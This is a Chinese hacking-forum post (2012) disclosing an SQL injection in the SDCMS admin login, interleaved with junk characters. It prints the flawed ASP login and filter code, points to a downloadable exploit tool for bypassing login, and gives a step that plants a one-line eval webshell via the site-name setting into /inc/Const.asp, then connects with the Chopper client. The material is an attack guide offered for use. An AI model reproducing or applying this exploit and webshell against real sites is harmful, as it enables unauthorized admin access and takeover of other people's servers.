作者:T00LS 鬼哥
3 _5 Y$ n `- o O9 e$ Y; a6 I漏洞文件:后台目录/index.asp
( b/ F/ t" ~% K7 l% f( N
r8 D$ E0 D3 r* USub Check
8 b4 w8 B* t8 N" J Dim username,password,code,getcode,Rs8 t0 a/ t5 q% L& u
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
* A/ {; W4 ?. y' q& d. ~ username=FilterText(Trim(Request.Form("username")),1)
+ k, T) R1 z9 \5 @: q6 D password=FilterText(Trim(Request.Form("password")),1)! w. r) r( V' x1 }: Z
code=Trim(Request.Form("yzm"))5 U6 |& _1 m+ B/ `
getcode=Session("SDCMSCode")
; r8 W6 o6 o4 E0 I) m1 v IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
[- d- F7 P1 _ p& q6 G1 D IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied8 P6 c1 B0 F& L: N- s1 G
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
+ a4 r. Q1 B/ N9 e; x1 D( h! y IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied; T A$ D9 b: ]
IF username="" or password="" Then
) U% H; ^1 X% Y1 } Echo "用户名或密码不能为空"ied+ |. x- e' e. y& |
Else
/ U' i5 w+ K. H0 q: d Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
) K3 N/ U* b& }* b7 Y IF Rs.Eof Then
; d9 A: E8 }7 g. W) u t, j( U% o AddLog username,GetIp,"登录失败",10 |$ D/ o6 E5 t/ V2 W/ y
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
+ a4 W2 X! i& p3 j! s Else0 M$ f' k* v! Y ]2 P
Add_Cookies "sdcms_id",Rs(0)
3 _( R0 i; C( V" m) y* N7 y9 L/ } Add_Cookies "sdcms_name",username
F3 i! A. U, p( M5 C' S {9 ` Add_Cookies "sdcms_pwd",Rs(2)
4 S/ V2 C$ c r, d5 a' p! S Add_Cookies "sdcms_admin",Rs(3)
- J0 x4 W) E+ u8 G- j2 x Add_Cookies "sdcms_alllever",Rs(4)& a( U. M# g F( ?$ O
Add_Cookies "sdcms_infolever",Rs(5)- w- ~2 R$ Z" S6 Z) V* Y6 P% Q
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
8 Q; T: G! k7 j+ t' ~8 t) o0 t AddLog username,GetIp,"登录成功",1
7 T/ k* M; [* H" c9 X '自动删除30天前的Log记录" l2 A0 S3 y! o4 u" @8 p
IF Sdcms_DataType Then
" Y7 m1 E H2 b: l Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
$ e' S( Z- q3 d$ H& h2 F0 l Else0 K) F& m) q0 F; w" Z0 e
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30"). B0 c5 g% r s( p0 @. i
End IF7 h% N* o; G, p- Q
Go("sdcms_index.asp")
0 y+ l. J# ]$ ]! w; { J End IF
8 Z, M+ |# Z1 N( g2 F! B) D9 | Rs.Close
2 n7 r( _9 ~8 q' _# \* ~) z Set Rs=Nothing
& J$ |5 p$ T: Z$ ] End IF0 E E- `; [ I% n2 V* g, z
End Sub
5 l3 e8 S* p. r' A0 \ B. \! q0 ~: ~; {* j( `- e0 ^( u
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
" h# E7 _8 u, K; Z% f, T! T& [
% F; Z6 ]" U5 b/ X' dFunction FilterText(ByVal t0,ByVal t1)
( U. f( n) f4 u6 q4 u I8 l( f IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function# c0 K. W, b# n' o6 U
t0=Trim(t0)% o/ N* W: ^' L8 W+ S
Select Case t13 q# P3 F& m) |% X' a) B1 @
Case "1": w* L' D# m+ _. V6 \0 {
t0=Replace(t0,Chr(32),"")
3 J' e) I8 {9 d4 h t0=Replace(t0,Chr(13),"")# Q; c* i% K# I4 A2 n
t0=Replace(t0,Chr(10)&Chr(10),"")
; v7 P$ a' `3 t- X1 T3 p% b: g t0=Replace(t0,Chr(10),"")
! e9 k2 K( t! X& \6 P+ _. q* x Case "2": ?3 v6 N B% l" {
t0=Replace(t0,Chr(8),"")'回格
' h0 b: N3 e: A t0=Replace(t0,Chr(9),"")'tab(水平制表符)
. @" o+ P T( B2 W1 U v; j4 } t0=Replace(t0,Chr(10),"")'换行
+ q; A, [2 \* }* R' ]' Q) A t0=Replace(t0,Chr(11),"")'tab(垂直制表符) [7 V8 ~& u- A2 s2 Z+ M8 y
t0=Replace(t0,Chr(12),"")'换页
0 k+ t% C" K) C- I( L& ] t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
$ R5 L& O% N& `4 l t0=Replace(t0,Chr(22),"")
' ^+ a3 u; C0 o t0=Replace(t0,Chr(32),"")'空格 SPACE
& v0 x [. _( i4 V: b t0=Replace(t0,Chr(33),"")'!
~' ]* X; o8 F3 u* ^ t0=Replace(t0,Chr(34),"")'"
+ X$ k X0 q) N. ^ t0=Replace(t0,Chr(35),"")'#
! X: Y) n( A4 z( | t0=Replace(t0,Chr(36),"")'$+ P2 F1 m7 S. p* D6 ]% b; g
t0=Replace(t0,Chr(37),"")'%
; u! j+ ?5 s+ \$ J t0=Replace(t0,Chr(38),"")'&
# {7 x+ {+ A( h# D1 E. f/ S* e, q" b t0=Replace(t0,Chr(39),"")''
; d5 z/ ~0 O6 w4 f# P/ U! C( G c t0=Replace(t0,Chr(40),"")'(; q3 v( E8 A, `, \! |
t0=Replace(t0,Chr(41),"")')+ \, q9 f" f- T# b
t0=Replace(t0,Chr(42),"")'*
# F# B1 J; x" B8 `. c6 B t0=Replace(t0,Chr(43),"")'+
^; S- U7 a$ n' o6 A* _0 s$ M t0=Replace(t0,Chr(44),"")',1 T: l0 Q6 g" M" j o. G
t0=Replace(t0,Chr(45),"")'-& \4 v0 L4 w1 C4 a1 a& n9 y6 q
t0=Replace(t0,Chr(46),"")'.
( B7 J2 Q( w' M t0=Replace(t0,Chr(47),"")'/
$ O; I! l2 R" i5 ^5 P" y t0=Replace(t0,Chr(58),"")':! `2 A2 r# \: y4 x. v4 y
t0=Replace(t0,Chr(59),"")';
J& _% g$ j5 Y! q% a* L( Q3 u7 X t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>1 o, a1 ]: y. A( k" S
t0=Replace(t0,Chr(63),"")'?
( {$ ]1 H9 Q' e, q) _4 H t0=Replace(t0,Chr(64),"")'@
7 ^. a3 C( x4 _1 _ t0=Replace(t0,Chr(91),"")'\! g( I7 n3 H$ l$ @+ o, _, z9 b4 H* p- a
t0=Replace(t0,Chr(92),"")'\
) I' _ j. e5 ]# }5 d t0=Replace(t0,Chr(93),"")']! y# K$ E! }- t
t0=Replace(t0,Chr(94),"")'^- s0 v. \, M2 h# {* _: Y& u
t0=Replace(t0,Chr(95),"")'_: W L! p5 e D% w* s+ n9 z2 u8 Z% T
t0=Replace(t0,Chr(96),"")'`
% S7 X% V0 Q6 S9 J t0=Replace(t0,Chr(123),"")'{& O. M. \9 i! j7 K
t0=Replace(t0,Chr(124),"")'|& z+ P6 A. W' t! U+ ?+ O" G; f
t0=Replace(t0,Chr(125),"")'}
8 \: s$ x4 K+ [: b% M t0=Replace(t0,Chr(126),"")'~
1 m% Q; a" i) p, l Case Else
$ H" T( q3 L m0 t" R% M; i t0=Replace(t0, "&", "&")
" @# [& j8 D i7 k) l5 t1 Y/ c t0=Replace(t0, "'", "'")
, c* [' r$ I0 K3 \6 N" f t0=Replace(t0, """", """)
7 `6 x: r2 E+ X9 A t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
" r, U* B/ t- m% |1 x' ]$ C End Select% T; H5 \- T) j6 H) e, Y
IF Instr(Lcase(t0),"expression")>0 Then" ? V K( q7 [# T
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)8 b& a: P. b2 N: {" [
End If
% d5 e% f$ P4 K7 N: B FilterText=t0
& S; ^1 y9 o* K) ?, |# vEnd Function
6 e% y( V; J% E% y4 B# |
, l$ F* K1 ]+ I) n; ~, A看到没。直接参数是1 只过滤, `- C8 F' Z+ t) z( z
t0=Replace(t0,Chr(32)," "); H r0 M# N2 C! w* P. f0 J% [" p
t0=Replace(t0,Chr(13),"")! R$ [/ i4 }( D
t0=Replace(t0,Chr(10)&Chr(10),"
$ k1 t0 c* I3 G* o X")
5 n; g( R2 w; T2 e9 U9 U* I3 w& A+ S7 q t0=Replace(t0,Chr(10),"
- T/ k) ~9 b& t: Z: s$ c" Z")2 w- A" y: f% w
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
- W1 |1 ]" E8 ~4 K( S7 ^7 g$ b7 k cEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP( y% n" }/ _& W, {
; B9 l& K5 ], g% p8 \- Y6 r2 L# [3 G
测试:. y6 D) ~; h. M7 p E9 J3 B
' Y9 A9 r X6 [5 B' a& d% W, [" m2 k; h& J- x+ z/ _% W6 G
现在输入工具上验证码,然后点OK
' ^+ F. W) {0 n' I; M6 P, ?5 R- d8 z5 U: u& @& O
4 Q$ t4 `4 |7 S' B8 K4 c$ R8 N
看到我们直接进入后台管理界面了,呵呵! [; ?& @' }# [# o( B8 I! |+ c
/ ]5 }; x/ F7 s- t" X/ f& V3 M
2 K, T- a1 m& R' g& w% C
: Y$ i9 g6 h3 v: G! j这样直接进入后台了。。。。
2 H1 I, h- k2 H- m) M ?3 M
) m7 ]/ H2 @! i8 Z( A& }, i3 Y
% U) z7 p8 ]+ z& V+ E& S r1 g6 t+ o, g2 V
SDCMS提权:
& m1 q# C( s ^0 @$ p
4 L& z5 D, p. L; N5 d4 C' F方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
; T& k/ J1 Q+ u9 t
! y5 F/ `* D: _& b! t1 d" C h* R; s4 L1 _* _
4 c# u, \3 t: Z$ r1 H$ m7 JOK,现在用菜刀连接下!' ?1 |8 E$ G5 z
, r" e) t$ X8 i6 P& _. Q# _1 K4 X: P" _: I# }2 L3 S4 O5 O4 w
2 n7 y5 G$ n$ \7 v1 ]9 {2 @5 W8 j
; z$ V W ~% O+ F- V$ ` B
1 s$ S0 Y5 U0 H" {& T& X# ~ |
发表于 2012-11-9 20:57:02
收藏
支持
反对